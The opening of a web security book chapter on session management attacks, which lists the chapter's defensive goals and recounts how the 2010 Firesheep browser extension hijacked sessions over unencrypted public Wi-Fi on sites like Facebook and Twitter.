chapter three
3 Attacking session management
This chapter covers
- Understanding how session management works;
- How session identification data may be stolen by attackers;
- Determining that an attack has occurred, and how to prevent it altogether;
- Protecting session (and other) cookies;
- Making sure HTTPS is used throughout.
In late 2010, software developer Eric Butler released a Firefox extension called “Firesheep”. It worked like this: connect to a public Wi-Fi network, like a train station or coffee shop. When installed and active, the extension was continuously analyzing (unencrypted) data in the current wireless network. If someone else in the same network was logged into a select number of sites, a window popped up, prompting you whether you would like to go to that site, as that other person. And indeed—one click later, you could access a third-party site as the person sitting close to you. Those sites included:
- Amazon;
- Facebook;
- Google (including Google Mail);
- Hacker News;
- LinkedIn;
- Quora;
- Reddit;
- Stack Overflow;
- Twitter;
- Windows Live (including Windows Live Mail, previously known as Hotmail);
- Yahoo (including Yahoo Mail);
- And about 20 more.